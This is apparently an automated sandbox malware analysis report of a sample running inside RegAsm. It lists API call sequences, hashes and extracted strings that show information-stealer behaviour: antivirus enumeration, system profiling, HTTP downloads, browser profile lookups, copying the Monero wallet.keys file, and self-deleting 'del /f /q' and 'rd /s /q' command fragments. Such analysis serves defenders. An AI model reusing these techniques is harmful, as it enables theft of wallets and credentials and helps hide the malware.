                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
                                                                                      • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                      • API String ID: 4288110179-315474579
                                                                                      • Opcode ID: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
                                                                                      • Instruction ID: 57f5dd6b1c42f14037633b54d5227166f1307bde404719c4590db73b27f854ba
                                                                                      • Opcode Fuzzy Hash: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
                                                                                      • Instruction Fuzzy Hash: 6B314F70A44245BBCB20DB91DC49EEFBF7DEFC9B10F20561AF611A61A0C6B85941CB68
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 004012A7
                                                                                      • _memset.LIBCMT ref: 004012B6
                                                                                      • lstrcatA.KERNEL32(?,0043A9EC), ref: 004012D0
                                                                                      • lstrcatA.KERNEL32(?,0043A9F0), ref: 004012DE
                                                                                      • lstrcatA.KERNEL32(?,0043A9F4), ref: 004012EC
                                                                                      • lstrcatA.KERNEL32(?,0043A9F8), ref: 004012FA
                                                                                      • lstrcatA.KERNEL32(?,0043A9FC), ref: 00401308
                                                                                      • lstrcatA.KERNEL32(?,0043AA00), ref: 00401316
                                                                                      • lstrcatA.KERNEL32(?,0043AA04), ref: 00401324
                                                                                      • lstrcatA.KERNEL32(?,0043AA08), ref: 00401332
                                                                                      • lstrcatA.KERNEL32(?,0043AA0C), ref: 00401340
                                                                                      • lstrcatA.KERNEL32(?,0043AA10), ref: 0040134E
                                                                                      • lstrcatA.KERNEL32(?,0043AA14), ref: 0040135C
                                                                                      • lstrcatA.KERNEL32(?,0043AA18), ref: 0040136A
                                                                                      • lstrcatA.KERNEL32(?,0043AA1C), ref: 00401378
                                                                                        • Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                        • Part of subcall function 00410C85: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
                                                                                        • Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                      • ExitProcess.KERNEL32 ref: 004013E3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcat$HeapProcess_memset$AllocateComputerExitName
                                                                                      • String ID:
                                                                                      • API String ID: 2891980384-0
                                                                                      • Opcode ID: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
                                                                                      • Instruction ID: 239c304b61717195b0da288002eafcd0eca44a14d3e88ecdb176445cbc2bad3c
                                                                                      • Opcode Fuzzy Hash: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
                                                                                      • Instruction Fuzzy Hash: BD4196B2D4422C66DB20DB719C59FDB7BAC9F18310F5005A3A9D8F3181D67CDA84CB98
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 00418296
                                                                                      • _memset.LIBCMT ref: 004182A5
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 004182BA
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                      • ShellExecuteEx.SHELL32(?), ref: 00418456
                                                                                      • _memset.LIBCMT ref: 00418465
                                                                                      • _memset.LIBCMT ref: 00418477
                                                                                      • ExitProcess.KERNEL32 ref: 00418487
                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                      • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$xBx
                                                                                      • API String ID: 2823247455-1587537260
                                                                                      • Opcode ID: 8889f6fbfac350e87a9fc1ced9bd81b6a41981885844d669c09df08f1be7d461
                                                                                      • Instruction ID: c0b88dd988d93b421ffa70f66641025a2a3514e4fd921881642ee0a142b314ca
                                                                                      • Opcode Fuzzy Hash: 8889f6fbfac350e87a9fc1ced9bd81b6a41981885844d669c09df08f1be7d461
                                                                                      • Instruction Fuzzy Hash: A951ACB1D4022A9BCB61EF15CD85ADDB3BCAB44708F4110EAA718B3151DA746FC68E58
                                                                                      APIs
                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
                                                                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
                                                                                      • wsprintfA.USER32 ref: 00410AA7
                                                                                      • lstrcatA.KERNEL32(00000000,00436E3C), ref: 00410AB6
                                                                                        • Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                        • Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
                                                                                        • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                        • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                      • lstrlenA.KERNEL32(?), ref: 00410ACD
                                                                                        • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                                                        • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 00410AF0
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                      • String ID: wA$:\$C$QuBi
                                                                                      • API String ID: 1856320939-1441494722
                                                                                      • Opcode ID: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
                                                                                      • Instruction ID: d36f890e74e7e8ef669b83a96deb31b174d36e7948efbde015f1e97a0a99ead9
                                                                                      • Opcode Fuzzy Hash: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
                                                                                      • Instruction Fuzzy Hash: B941AFB1A042289BCB249F749D85ADEBAB9EF19308F0000EAF109E3121E6758FD58F54
                                                                                      APIs
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                      • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
                                                                                      • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
                                                                                      • wsprintfA.USER32 ref: 004112DD
                                                                                      • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
                                                                                      • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
                                                                                      • lstrlenA.KERNEL32(?), ref: 00411347
                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                      • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                      • String ID: - $%s\%s$?
                                                                                      • API String ID: 1736561257-3278919252
                                                                                      • Opcode ID: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
                                                                                      • Instruction ID: a1c3be3d6f3fdb40de360404d346c16f4973fffda027df273c7b2494bd9b7707
                                                                                      • Opcode Fuzzy Hash: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
                                                                                      • Instruction Fuzzy Hash: A861F6B590022C9BEF21DB15DD84EDAB7B9AB44708F1042E6A608A2121DF35AFC9CF54
                                                                                      APIs
                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                        • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                        • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                      • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406836
                                                                                      • StrCmpCA.SHLWAPI(?), ref: 00406856
                                                                                      • InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00406877
                                                                                      • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406892
                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004068C8
                                                                                      • InternetReadFile.WININET(00000000,?,00000400,?), ref: 004068F8
                                                                                      • CloseHandle.KERNEL32(?), ref: 00406923
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040692A
                                                                                      • InternetCloseHandle.WININET(?), ref: 00406936
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                      • String ID: <+A
                                                                                      • API String ID: 2507841554-2778417545
                                                                                      • Opcode ID: 856b629bf82c4ff1a83c675378c3e7c10b8657cdf3afe6ec6eeb97d6b7c5d7bf
                                                                                      • Instruction ID: 1d44a0941bf69239cbc718c5fc054d573873141a30687fa59e6c761baef87c5b
                                                                                      • Opcode Fuzzy Hash: 856b629bf82c4ff1a83c675378c3e7c10b8657cdf3afe6ec6eeb97d6b7c5d7bf
                                                                                      • Instruction Fuzzy Hash: 22411CB1900128ABDF20DB21DD49BDA7BB9EB04315F1040B6BB09B21A1D6359E958FA9
                                                                                      APIs
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                        • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                        • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                        • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                        • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                        • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                        • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                        • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
                                                                                      • lstrlenA.KERNEL32(?), ref: 00416925
                                                                                        • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                      • StrStrA.SHLWAPI(00000000,?), ref: 0041693A
                                                                                      • lstrlenA.KERNEL32(?), ref: 00416949
                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00416962
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                      • API String ID: 4174444224-1526165396
                                                                                      • Opcode ID: cba5ef62937bcd0ece7cfbe729aa70542ea14c206f344e1eed86aa985cb31328
                                                                                      • Instruction ID: f999f3c62c0b23b7ff363c4994354db6f8ba44fc0c3398813b2d55053c878ef3
                                                                                      • Opcode Fuzzy Hash: cba5ef62937bcd0ece7cfbe729aa70542ea14c206f344e1eed86aa985cb31328
                                                                                      • Instruction Fuzzy Hash: 6021E571910204ABCB10BB75DC469DD77B8AF04308F11512BFC05E3191DB7DD9858F99
                                                                                      APIs
                                                                                      • StrCmpCA.SHLWAPI(0094C481), ref: 0040EAF9
                                                                                      • StrCmpCA.SHLWAPI(0094C481), ref: 0040EB56
                                                                                      • StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0040EE1D
                                                                                      • StrCmpCA.SHLWAPI(0094C481), ref: 0040EC33
                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                      • StrCmpCA.SHLWAPI(0094C481), ref: 0040ECE3
                                                                                      • StrCmpCA.SHLWAPI(0094C481), ref: 0040ED40
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcpy
                                                                                      • String ID: Stable\$ Stable\$firefox
                                                                                      • API String ID: 3722407311-2697854757
                                                                                      • Opcode ID: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
                                                                                      • Instruction ID: 5ee9920858f87ab95f25d72870b6309d75f224e844084726c2f6447a77145a42
                                                                                      • Opcode Fuzzy Hash: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
                                                                                      • Instruction Fuzzy Hash: 5FB19E72D00109AFDF20FFA9D947B8D7772AF40318F550126F904B7291DB78AA688BD9
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 00401ADC
                                                                                        • Part of subcall function 00401A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                        • Part of subcall function 00401A51: HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                        • Part of subcall function 00401A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                        • Part of subcall function 00401A51: RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                      • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00401AF1
                                                                                      • lstrlenA.KERNEL32(?), ref: 00401AFE
                                                                                      • lstrcatA.KERNEL32(?,.keys), ref: 00401B19
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                        • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                      • CopyFileA.KERNEL32(?,?,00000001,0043A99C,004369EF,\Monero\wallet.keys,004369EE), ref: 00401C2A
                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                        • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                        • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                        • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
